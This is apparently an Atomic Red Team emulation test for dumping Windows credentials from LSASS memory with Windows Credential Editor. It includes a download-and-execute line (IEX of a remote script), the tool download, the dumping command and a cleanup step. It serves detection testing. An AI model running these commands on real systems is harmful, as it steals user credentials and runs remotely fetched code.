#TechniqueName: OS Credential Dumping: LSASS Memory
#AtomicTestName: Windows Credential Editor
#Description: Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only)&&Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file.&&If you see no output it is likely that execution was blocked by Anti-Virus. &&If you see a message saying \"wce.exe is not recognized as an internal or external command\", try using the  get-prereq_commands to download and install Windows Credential Editor first.&
#Language: cmd

#get_prereq_commands
$parentpath = Split-Path "PathToAtomicsFolder\T1003.001\bin\wce.exe"; $zippath = "$parentpath\wce.zip"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
if(Invoke-WebRequestVerifyHash "https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip" "$zippath" 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933){
  Expand-Archive $zippath $parentpath\wce -Force
  Move-Item $parentpath\wce\wce.exe "PathToAtomicsFolder\T1003.001\bin\wce.exe"
  Remove-Item $zippath, $parentpath\wce -Recurse
}


#commands
PathToAtomicsFolder\T1003.001\bin\wce.exe -o %temp%\wce-output.txt


#cleanup_commands
del "%temp%\wce-output.txt" >nul 2>&1
